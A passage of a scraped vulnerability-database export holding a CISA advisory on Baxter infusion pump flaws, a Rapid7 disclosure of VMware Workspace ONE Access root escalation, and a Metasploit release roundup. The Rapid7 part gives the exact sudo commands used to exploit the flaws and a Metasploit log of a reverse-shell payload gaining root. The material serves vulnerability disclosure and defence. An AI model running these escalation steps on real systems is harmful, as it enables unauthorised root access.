Sigma Spectrum v8.x model 35700BAX2\n * Baxter Spectrum IQ (v9.x) model 35700BAX3\n * Sigma Spectrum LVP v6.x Wireless Battery Modules v16, v16D38, v17, v17D19, v20D29 to v20D32, and v22D24 to v22D28\n * Sigma Spectrum LVP v8.x Wireless Battery Modules v17, v17D19, v20D29 to v20D32, and v22D24 to v22D28\n * Baxter Spectrum IQ LVP (v9.x) with Wireless Battery Modules v22D19 to v22D28\n\n### 4.2 VULNERABILITY OVERVIEW\n\n#### 4.2.1 [MISSING ENCRYPTION OF SENSITIVE DATA CWE-311](<https://cwe.mitre.org/data/definitions/311.html>)\n\nThe Baxter Spectrum WBM (v16, v16D38, v17, v17D19, v20D29 to v20D32, and v22D19 to v22D28) stores network credentials and patient health information (PHI) in unencrypted form. PHI is only stored in Spectrum IQ pumps using auto programming. An attacker with physical access to a device without all data and settings erased may be able to extract sensitive information.\n\n[CVE-2022-26390](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26390>) has been assigned to this vulnerability. A CVSS v3 base score of 4.2 has been calculated; the CVSS vector string is ([AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N>)).\n\n#### 4.2.2 [ USE OF EXTERNALLY CONTROLLED FORMAT STRING CWE-134](<https://cwe.mitre.org/data/definitions/134.html>)\n\n**\\--------- Begin Update A part 2 of 3 ---------**\n\nThe Baxter Spectrum WBM (v16, v16D38, v17, v17D19, and v20D29 to v20D32) when in superuser mode is susceptible to format string attacks via application messaging. An attacker could use this to read memory in the WBM, potentially accessing sensitive information.\n\n**\\--------- End Update A part 2 of 3 ---------**\n\nThe Baxter Spectrum WBM (v16, v16D38) and Baxter Spectrum WBM (v17, v17D19, v20D29 to v20D32), when in superuser mode, are susceptible to format string attacks via application messaging. An attacker could use this to read memory in the WBM to access sensitive information.\n\n[CVE-2022-26392](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26392>) has been assigned to this vulnerability. A CVSS v3 base score of 3.1 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N>)).\n\n#### 4.2.3 [USE OF EXTERNALLY CONTROLLED FORMAT STRING CWE-134](<https://cwe.mitre.org/data/definitions/134.html>)\n\nThe Baxter Spectrum WBM (v20D29) is susceptible to format string attacks via application messaging. An attacker could use this to read memory in the WBM to access sensitive information or cause a denial-of-service condition on the WBM.\n\n[CVE-2022-26393](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26393>) has been assigned to this vulnerability. A CVSS v3 base score of 5.0 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L>)).\n\n#### 4.2.4 [MISSING AUTHENTICATION FOR CRITICAL FUNCTION CWE-306](<https://cwe.mitre.org/data/definitions/306.html>)\n\n**\\--------- Begin Update A part 3 of 3 ---------**\n\nThe Baxter Spectrum WBM (v16, v16D38, v17, v17D19, and v20D29 to v20D32) does not perform mutual authentication with the gateway server host. This could allow an attacker to perform a machine-in-the-middle attack that modifies parameters, making the network connection fail. Alternatively, an attacker could spoof the server host and send specifically crafted data.\n\n[CVE-2022-26394](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26394>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:L>)).\n\n**\\--------- End Update A part 3 of 3 ---------**\n\n### 4.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Healthcare and Public Health\n * **COUNTRIES/AREAS DEPLOYED:** United States, Canada, Puerto Rico, Caribbean\n * **COMPANY HEADQUARTERS LOCATION:** United States\n\n### 4.4 RESEARCHER\n\nDeral Heiland, Principal IoT Researcher at Rapid 7, reported these vulnerabilities to Baxter.\n\n## 5\\. MITIGATIONS\n\nAccording to Baxter, software updates to disable Telnet and FTP (CVE-2022-26392) are in process. Software updates addressing the format string attack (CVE-2022-26393) are included in WBM version 20D30 and all other WBM versions authentication is already available in Spectrum IQ (CVE-2022-26394).\n\nInstructions to erase all data and settings on WBMs and pumps before decommissioning and transferring to other facilities (CVE-2022-26390) are in process for incorporation into the Spectrum Operator\u2019s Manual.\n\nBaxter provides recommended steps for erasing all data and settings on the pump to be decommissioned:\n\n * Reset the network settings (Biomed->Network Configuration->Transfer Network Settings->Reset).\n * Delete the drug library.\n * Clear the history log.\n\nTo erase all data and settings on the WBM to be decommissioned:\n\n * Select a pump other than the one last used with the WBM.\n * Reset the network settings and enable networking on the pump.\n * Place the WBM on the pump.\n * Wait until the network icon turns yellow.\n\nIn conjunction with the user\u2019s own network security policies, Baxter recommends the following mitigations to reduce the likelihood these vulnerabilities will be exploited:\n\n * Ensure appropriate physical controls within user environments to protect against unauthorized access to devices.\n * Isolate the Spectrum Infusion Systems to its own network virtual local area network (VLAN) to segregate the system from other hospital systems and reduce the probability that a threat actor could execute an adjacent attack, such as a machine-in-the-middle attack against the system to observe clear-text communications.\n * Use the strongest available wireless network security protocols (WPA2, EAP-TLS, etc.) to provide authentication/encryption of wireless data sent to/from the Spectrum Infusion System. \n * Users should ensure the WBM is rebooted after configuration for their network(s) by removing the WBM from the rear of the Spectrum device for 10-15 seconds, and then re-attaching the WBM. \n * Users should always monitor for and/or block unexpected traffic, such as FTP and Telnet, at network boundaries into the Spectrum-specific VLAN.\n\nAs a last resort, users may disable wireless operation of the pump; the Spectrum Infusion System was designed to operate without network access. This action would impact an organization\u2019s ability to rapidly deploy drug library (formulary) updates to their pumps.\n\nFor additional information, see the [Baxter Product Security Bulletin](<https://www.baxter.com/product-security#additionalresources>).\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure they are [not accessible from the Internet](<https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls and isolate them from business networks.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as its connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/Recommended-Practices>) on the ICS webpage at [cisa.gov/ics](<https://cisa.gov/ics>). Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with [Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS webpage at [cisa.gov/ics](<https://cisa.gov/ics>) in the technical information paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.cisa.gov/uscert/ics/tips/ICS-TIP-12-146-01B>).\n\nOrganizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities. These vulnerabilities have a high attack complexity.\n\n### Vendor\n\nBaxter\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-09-29T12:00:00", "type": "ics", "title": "Baxter Sigma Spectrum Infusion Pump (Update A)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26390", "CVE-2022-26392", "CVE-2022-26393", "CVE-2022-26394"], "modified": "2022-09-29T12:00:00", "id": "ICSMA-22-251-01", "href": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-22-251-01", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:P"}}], "rapid7blog": [{"lastseen": "2022-08-05T16:02:09", "description": "\n\nThe VMware Workspace ONE Access, Identity Manager, and vRealize Automation products contain a locally exploitable vulnerability whereby the under-privileged `horizon` user can escalate their permissions to those of the `root` user. Notably, the `horizon` user runs the externally accessible web application. This means that remote code execution (RCE) within that component could be chained with this vulnerability to obtain remote code execution as the root user. At the time of this writing, [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>) is one such RCE vulnerability (that notably has a corresponding [Metasploit module here](<https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb>)) that can be easily chained with one or both of the issues described herein.\n\n## Product description\n\n[VMWare Workspace ONE Access](<https://www.vmware.com/products/workspace-one/access.html>) is a platform that provides organizations with the means to provide their employees fast and easy access to applications they need. VMware Workspace ONE Access was formerly known as VMware Identity Manager.\n\n## Impact\n\nThese vulnerabilities are local privilege escalation flaws, and by themselves, present little risk in an otherwise secure environment. In both cases, the local user must be `horizon` for successful exploitation.\n\nThat said, it\u2019s important to note that the `horizon` user runs the externally accessible web application, which has seen several recent vulnerabilities \u2014 namely [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>), which, when exploited, allows for remote code execution as the `horizon` user. Thus, chaining an exploit for CVE-2022-22954 with either of these vulnerabilities can allow a remote attacker to go from no access to root access in two steps.\n\n## Credit\n\nThese issues were disclosed by VMware on Tuesday, August 2, 2022 within the [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) bulletin. In June, Spencer McIntyre of Rapid7 discovered these issues while researching an unrelated vulnerability. They were disclosed in accordance with [Rapid7\u2019s vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>).\n\n## CVE-2022-31660\n\nCVE-2022-31660 arises from the fact that the permissions on the file `/opt/vmware/certproxy/bin/cert-proxy.sh` are such that the `horizon` user is both the owner and has access to invoke this file.\n\nTo demonstrate and exploit this vulnerability, that file is overwritten, and then the following command is executed as the `horizon` user:\n \n \n sudo /usr/local/horizon/scripts/certproxyService.sh restart\n \n\nNote that, depending on the patch level of the system, the certproxyService.sh script may be located at an alternative path and require a slightly different command:\n \n \n sudo /opt/vmware/certproxy/bin/certproxyService.sh restart\n \n\nIn both cases, the horizon user is able to invoke the `certproxyService.sh` script from sudo without a password. This can be verified by executing `sudo -n --list`. The `certproxyService.sh` script invokes the `systemctl` command to restart the service based on its configuration file. The service configuration file, located at `/run/systemd/generator.late/vmware-certproxy.service`, dispatches to `/etc/rc.d/init.d/vmware-certproxy` through the `ExecStart` and `ExecStop` directives, which in turn executes `/opt/vmware/certproxy/bin/cert-proxy.sh`.\n\n### Proof of concept\n\nTo demonstrate this vulnerability, a Metasploit module was written and submitted on GitHub in [PR #16854](<https://github.com/rapid7/metasploit-framework/pull/16854>).\n\nWith an existing Meterpreter session, no options other than the SESSION need to be specified. Everything else will be automatically determined at runtime. In this scenario, the original Meterpreter session was obtained with the [module for CVE-2022-22954](<https://github.com/rapid7/metasploit-framework/blob/6532365dc84c2052018456434363e4bfeca85ad4/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb>), released earlier this year.\n \n \n [*] Sending stage (40132 bytes) to 192.168.159.98\n [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.98:42312) at 2022-08-02 16:26:16 -0400\n \n meterpreter > sysinfo\n Computer : photon-machine\n OS : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021\n Architecture : x64\n System Language : en_US\n Meterpreter : python/linux\n meterpreter > getuid\n Server username: horizon\n meterpreter > background \n [*] Backgrounding session 1...\n msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe \n [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp\n msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > set SESSION -1\n SESSION => -1\n msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > run\n \n [*] Started reverse TCP handler on 192.168.250.134:4444 \n [*] Backing up the original file...\n [*] Writing '/opt/vmware/certproxy/bin/cert-proxy.sh' (601 bytes) ...\n [*] Triggering the payload...\n [*] Sending stage (40132 bytes) to 192.168.250.237\n [*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:63493) at 2022-08-02 16:26:57 -0400\n [*] Restoring file contents...\n [*] Restoring file permissions...\n \n meterpreter > getuid\n Server username: root\n meterpreter >\n \n\n## CVE-2022-31661\n\nCVE-2022-31660 arises from the fact that the `/usr/local/horizon/scripts/getProtectedLogFiles.hzn` script can be run with root privileges without a password using the sudo command. This script in turn will recursively change the ownership of a user-supplied directory to the `horizon` user, effectively granting them write permissions to all contents.\n\nTo demonstrate and exploit this vulnerability, we can execute the following command as the `horizon` user:\n \n \n sudo /usr/local/horizon/scripts/getProtectedLogFiles.hzn exportProtectedLogs /usr/local/horizon/scripts/\n \n\nAt this point, the horizon user has write access (through ownership) to a variety of scripts that also have the right to invoke using sudo without a password. These scripts can be verified by executing `sudo -n --list`. A careful attacker would have backed up the ownership information for each file in the directory they intend to target and restored them once they had obtained root-level permissions.\n\nThe root cause of this vulnerability is that the `exportProtectedLogs` subcommand invokes the `getProtectedLogs` function that will change the ownership information to the `TOMCAT_USER`, which happens to be `horizon`.\n\nExcerpt from `getProtectedLogFiles.hzn`:\n \n \n function getProtectedLogs()\n {\n chown ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION\n rm -f $TARGET_DIR_LOCATION/messages*\n rm -f $TARGET_DIR_LOCATION/boot*\n rm -rf $TARGET_DIR_LOCATION/journal*\n \n cp $VAR_LOG_MESSAGES* $TARGET_DIR_LOCATION\n cp $BOOT_LOG_MESSAGES* $TARGET_DIR_LOCATION\n chown -R ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION/\n \n }\n \n\n## Remediation\n\nUsers should apply patches released in [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) to remediate these vulnerabilities. If they are unable to, users should segment the appliance from remote access, especially if known issues in the web front end like CVE-2022-22954 also remain unpatched.\n\nNote that fixing these vulnerabilities helps shore up internal, local defenses against attacks targeting external interfaces. For practical purposes, these issues are merely internal, local privilege escalation issues, so enterprises running VMWare Workspace One Access installations with current patch levels should schedule updates addressing these issues as part of routine patch cycles.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to vulnerabilities described in [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) with authenticated, version-based coverage released on August 4, 2022 (ContentOnly-content-1.1.2606-202208041718).\n\n## Disclosure timeline\n\n * **May 20, 2022** \\- Issue discovered by Spencer McIntyre of Rapid7\n * **June 28, 2022** \\- Rapid7 discloses the vulnerability to VMware\n * **June 29, 2022** \\- VMware acknowledges receiving the details and begins an * investigation\n * **June 30, 2022** \\- VMware confirms that they have reproduced the issues, requests that Rapid7 not involve CERT for simplicity\u2019s sake\n * **July 1, 2022** \\- Rapid7 replies, agreeing to leave CERT out\n * **July 22, 2022** \\- VMware states they will publish an advisory once the issues have been fixed, asks whom to credit\n * **July 22, 2022** \\- Rapid7 responds confirming credit, inquires about a target date for a fix\n * **August 2, 2022** \\- VMware discloses these vulnerabilities as part of VMSA-2022-0021 (without alerting Rapid7 of pending disclosure)\n * **August 2, 2022** \\- Metasploit module submitted on GitHub in [PR #16854](<https://github.com/rapid7/metasploit-framework/pull/16854>)\n * **August 5, 2022** \\- This disclosure blog\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T15:13:15", "type": "rapid7blog", "title": "CVE-2022-31660 and CVE-2022-31661 (FIXED): VMware Workspace ONE Access, Identity Manager, and vRealize Automation LPE", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-31660", "CVE-2022-31661"], "modified": "2022-08-05T15:13:15", "id": "RAPID7BLOG:2C118F02F42DB14EC4F6AF30FFB72A76", "href": "https://blog.rapid7.com/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-05T20:01:16", "description": "## Log4Shell in MobileIron Core\n\n\n\nThanks to [jbaines-r7](<https://github.com/jbaines-r7>) we have yet another Log4Shell [exploit](<https://github.com/rapid7/metasploit-framework/pull/16837>). Similar to the other Log4Shell exploit modules, the exploit works by sending a JNDI string that once received by the server will be deserialized, resulting in unauthenticated remote code execution as the `tomcat` user. Vulnerable versions of MobileIron Core have been reported as [exploited](<https://www.mandiant.com/resources/mobileiron-log4shell-exploitation>) in the wild.\n\n## VMware Workspace ONE Access LPE\n\nOur very own [Spencer McIntyre](<https://github.com/zeroSteiner>) discovered and added a local privilege escalation [module](<https://github.com/rapid7/metasploit-framework/pull/16854>) for [CVE-2022-31660](<https://www.rapid7.com/blog/post/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/>) in VMware Workspace ONE Access. By default, the `horizon` user has write permissions to the `/opt/vmware/certproxy/bin/cert-proxy.sh` script, and the `sudo` configuration does not require supplying a password when invoking the script. Due to this, an attacker can write arbitrary code to the `/opt/vmware/certproxy/bin/cert-proxy.sh` script and escalate their privileges to that of the `root` user by executing the `certproxyService.sh` with `sudo`. Because the `horizon` user runs the externally-facing web application in VMware Workspace ONE Access, [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>) can be leveraged for initial access to the target.\n\n## XML-RPC Unauthenticated RCE in Zoho Password Manager\n\n[Grant Willcox](<https://github.com/gwillcox-r7>) of the Metasploit team added a [module](<https://github.com/rapid7/metasploit-framework/pull/16852>) that exploits a deserialization flaw in Zoho Password Manager Pro. Sending a single POST request containing XML-RPC data to the `/xmlrpc` endpoint will result in unauthenticated code execution as `NT AUTHORITY\\SYSTEM`.\n\n## New module content (5)\n\n * [Cisco PVC2300 POE Video Camera configuration download](<https://github.com/rapid7/metasploit-framework/pull/16857>) by Craig Heffner and Erik Wynter - This adds a module targeting Cisco PVC2300 IP Cameras that will download the configuration file using hard-coded credentials.\n * [BACnet Scanner](<https://github.com/rapid7/metasploit-framework/pull/16788>) by Paz - This adds a new scanner module that discovers BACnet devices on the network and extracts model name, software version, firmware revision, and device description. Once the data is processed, it is displayed on screen and saved to a local xml file.\n * [MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16837>) by RageLtMan, Spencer McIntyre, jbaines-r7, and rwincey, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>) \\- This adds an exploit for MobileIron which is affected by the Log4Shell vulnerability. The result is an unauthenticated remote code execution in the context of the web application user.\n * [VMware Workspace ONE Access CVE-2022-31660](<https://github.com/rapid7/metasploit-framework/pull/16854>) by Spencer McIntyre, which exploits [CVE-2022-31660](<https://attackerkb.com/topics/GUT2CbttnF/cve-2022-31660?referrer=blog>) \\- This module exploits CVE-2022-31660, an LPE disclosed by VMware in VMSA-2022-0021. The underlying flaw is that the /opt/vmware/certproxy/bin/cert-proxy.sh script is writable by the horizon user who can also indirectly execute it by invoking the certproxyService.sh script via sudo which is permitted without a password, enabling escalation to root.\n * [Zoho Password Manager Pro XML-RPC Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/16852>) by Grant Willcox, Vinicius, and Y4er, which exploits [CVE-2022-35405](<https://attackerkb.com/topics/9IKNFYh9Wl/cve-2022-35405?referrer=blog>) \\- This PR adds in an exploit module for CVE-2022-35405 aka Zoho Password Manager Pro XML-RPC Unauthenticated RCE as SYSTEM.\n\n## Enhancements and features (3)\n\n * [#16833](<https://github.com/rapid7/metasploit-framework/pull/16833>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This PR adds an option to the host command to make it easier to delete host tags.\n * [#16840](<https://github.com/rapid7/metasploit-framework/pull/16840>) from [bcoles](<https://github.com/bcoles>) \\- This replaces some Meterpreter-only method calls with method calls that check the session type, which allows non-Meterpreter sessions to use read_profile_list \nand load_missing_hives. Also, this changes read_profile_list to be able to read profile information for all accounts.\n * [#16858](<https://github.com/rapid7/metasploit-framework/pull/16858>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates ZeroLogon to have better error handling in the check method. This will cause the error from an invalid NetBIOS name to be reported with a meaningful message.\n\n## Bugs fixed (8)\n\n * [#16820](<https://github.com/rapid7/metasploit-framework/pull/16820>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This PR fixes an issue in the ldap_query module where if the datastore option "action" wasn't set the module would fail.\n * [#16822](<https://github.com/rapid7/metasploit-framework/pull/16822>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug in `Rex::Ui::Text::Input::Buffer::BufferSock` that was causing data to be occasionally lost due to the rsock monitor routine stopping abruptly.\n * [#16825](<https://github.com/rapid7/metasploit-framework/pull/16825>) from [rbowes-r7](<https://github.com/rbowes-r7>) \\- The IMAP credential capture module did not appropriately handle literal strings as specified by RFC3501. The code has been updated to handle these strings efficiently.\n * [#16832](<https://github.com/rapid7/metasploit-framework/pull/16832>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This fix removes an unnecessary echo statement from the ms10_092_schelevator module.\n * [#16839](<https://github.com/rapid7/metasploit-framework/pull/16839>) from [bcoles](<https://github.com/bcoles>) \\- Fixes shell_registry_enumvals/getvaldata error checking.\n * [#16844](<https://github.com/rapid7/metasploit-framework/pull/16844>) from [bcoles](<https://github.com/bcoles>) \\- This PR updates the `post/multi/gather` module to support non-meterpreter sessions like shell and powershell.\n * [#16846](<https://github.com/rapid7/metasploit-framework/pull/16846>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Updates `auxiliary/scanner/ssh/ssh_login` to gracefully handle `Errno::EPIPE` exceptions.\n * [#16848](<https://github.com/rapid7/metasploit-framework/pull/16848>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Fix a crash when updating session information in Meterpreter.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.10...6.2.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-07-29T13%3A06%3A04-05%3A00..2022-08-04T11%3A39%3A27-05%3A00%22>)\n * [Full diff 6.2.10...6.2.11](<https://github.com/rapid7/metasploit-framework/compare/6.2.10...6.2.11>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-05T18:50:07", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-35405"], "modified": "2022-08-05T18:50:07", "id": "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9", "href": "https://blog.rapid7.com/2022/08/05/metasploit-weekly-wrap-up-170/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-06-03T14:40:27", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. A malicious actor with local access can escalate privileges to 'root'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31661", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-31661"], "modified": "2022-08-11T16:11:00", "cpe": ["cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:access_connector:21.08.0.0", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:access_connector:21.08.0.1", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:one_access:21.08.0.0", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:identity_manager_connector:3.3.5", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:access_connector:22.05", "cpe:/a:vmware:identity_manager:3.3.4"], "id": "CVE-2022-31661", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31661", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.05:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*", 